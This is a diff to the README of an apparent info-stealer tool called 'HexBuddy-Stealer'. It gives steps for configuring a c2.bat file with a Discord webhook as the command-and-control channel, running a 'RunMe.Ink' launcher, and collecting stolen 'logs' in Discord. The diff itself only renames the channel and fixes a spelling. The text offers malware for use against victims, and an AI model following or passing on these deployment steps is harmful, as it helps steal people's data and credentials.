255815/HexBuddy-Stealer/README.md

 4. Go To /Bin/c2.bat file in the Downloaded Folder in HexBuddyStealer and open in Notepad
 5. Edit The "set "Webtoken=https://discord.com/api/webhooks/your_webhook_here" "
 6. Run The "RunMe.Ink" and wait for 13 seconds
-7. Then Look At The General Channel On Discord ....
-You will Already Recieve Notifactions In The Channel
+7. Then Look At The C2 Channel On Discord ....
+You will Already Recieve Notifications In The Channel
 8. Enjoy The Logs <3

 Check Out My Git Book For More Cool Resourses !!